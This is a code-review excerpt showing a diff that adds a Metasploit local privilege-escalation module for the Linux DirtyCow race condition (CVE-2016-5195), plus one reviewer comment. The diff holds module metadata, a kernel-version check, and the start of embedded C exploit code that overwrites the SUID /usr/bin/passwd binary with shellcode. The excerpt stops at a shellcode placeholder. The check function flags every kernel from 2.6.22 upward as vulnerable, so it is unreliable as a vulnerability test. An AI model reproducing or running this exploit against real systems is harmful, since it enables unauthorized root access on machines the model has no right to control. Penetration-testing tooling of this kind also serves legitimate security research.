modules/exploits/linux/local/dirtycow.rb

```diff
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name' => 'Linux Kernel DirtyCow Local Privilege Escalation',
+      'Description' => %q{
+        A race condition was found in the way the Linux kernel's memory
+        subsystem handled the copy-on-write (COW) breakage of private
+        read-only memory mappings. An unprivileged local user could use
+        this flaw to gain write access to otherwise read-only memory mappings
+        and thus increase their privileges on the system.
+        The bug has existed since around Linux Kernel 2.6.22 (released in 2007).
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'Phil Oester', # Vulnerability Discovery
+        'Robin Verton', # cowroot.c developer
+        'Nixawk' # original module developer
+      ],
+      'Platform' => [ 'linux' ],
+      'Arch' => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes' => ['shell', 'meterpreter'],
+      'References' =>
+        [
+          ['CVE', '2016-5195'],
+          ['URL', 'https://dirtycow.ninja/'],
+          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails'],
+          ['URL', 'https://access.redhat.com/security/cve/cve-2016-5195'],
+          ['URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619']
+        ],
+       'Targets' =>
+         [
+           [ 'Linux x86', { 'Arch' => ARCH_X86 }],
+           [ 'Linux x64', { 'Arch' => ARCH_X86_64 }]
+         ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Oct 19 2016'
+    }))
+
+    register_options([
+      OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ])
+    ])
+  end
+
+  def check
+    kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
+    if kernel >= Gem::Version.new('2.6.22')
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    main = %q^
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <string.h>
+#include <unistd.h>
+
+void *map;
+int f;
+int stop = 0;
+struct stat st;
+char *name;
+pthread_t pth1, pth2, pth3;
+
+char suid_binary[] = "/usr/bin/passwd";
+
+SHELLCODE
```

Comment:
Curiously, you don't even need to do this if you have a watchdog checking for root. It's nice that the payload is within the PoC, though.